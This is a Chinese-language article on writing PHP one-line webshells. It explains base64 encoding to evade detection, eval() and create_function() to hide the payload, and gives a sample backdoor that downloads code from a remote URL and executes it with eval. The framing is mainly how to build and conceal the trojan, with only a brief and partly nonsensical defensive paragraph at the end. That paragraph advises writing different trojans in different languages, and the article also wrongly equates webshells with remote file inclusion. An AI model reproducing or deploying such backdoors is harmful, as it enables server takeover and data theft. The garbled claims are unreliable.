PHP 型一句话木马的编写方式有很多种，但是一般经过熟练的利用 PHP 的常用函数，就可以将复杂的功能编写成一个比较简单的一句话木马。

PHP 编写一句话木马主要利用 PHP 内置函数，其中一些需要熟练掌握，比如 eval() 函数和 create_function() 函数以及 base64_decode() 函数等。

首先，我们使用 base64 编码来防止木马程序被检测到，base64_encode() 将字符串编码生成 base64 格式，而 base64_decode() 将字符串解码成原有字符串，这样就可以得到木马程序的源码。

接着，我们使用利用 eval() 函数来执行编码好的源程序，eval() 函数可以将一个字符串当做php代码来执行，是我们PHP型一句话木马编写的最主要方式。

而 PHP 里 create_function() 函数可以创建一个匿名函数，且可以通过 eval() 函数调用，这样可以使我们的一句话木马程序表现得更复杂，也更难被别人发现。

总的来说，PHP编写一句话木马就是借助PHP的内置函数，利用base64编码程序代码，然后使用eval函数调用运行，并用create_function函数来创建匿名函数，这样，就可以实现一句话木马的功能了。

"php木马"是网站安全中最常被提及的词汇，也称为“远程文件包含攻击”。它是指在Web服务器上以PHP脚本语言编写的一种恶意程序，该恶意程序可以让攻击者访问Web服务器上的文件或数据库，从而入侵系统，以获取私有信息或做中枢控制。

php木马的写法通常类似于以下代码：

<?php

$source_file = file_get_contents('http://website.com/backdoor.php');

eval($source_file);

?>

这里，file_get_contents用来访问“http://website.com/backdoor.php”，然后将其内容复制并存储至$source_file变量。接着，eval函数可以将$source_file的值当作php脚本直接执行，从而可以让攻击者获取系统权限等信息。

此外，php木马的构造也可以结合用户输入来进行操作，实现木马更为隐蔽，攻击者可以用户提供的输入变量重新构造一段目标网站攻击性的PHP代码，进一步进行恶意攻击。

为了防止被利用，网站保护者需要对操作网站的web服务器进行定期审计，以避免漏洞的出现；同时，不同种类的木马建议使用不同的脚本编程语言写出，以便进行正确的安全措施，防止php木马的钻入。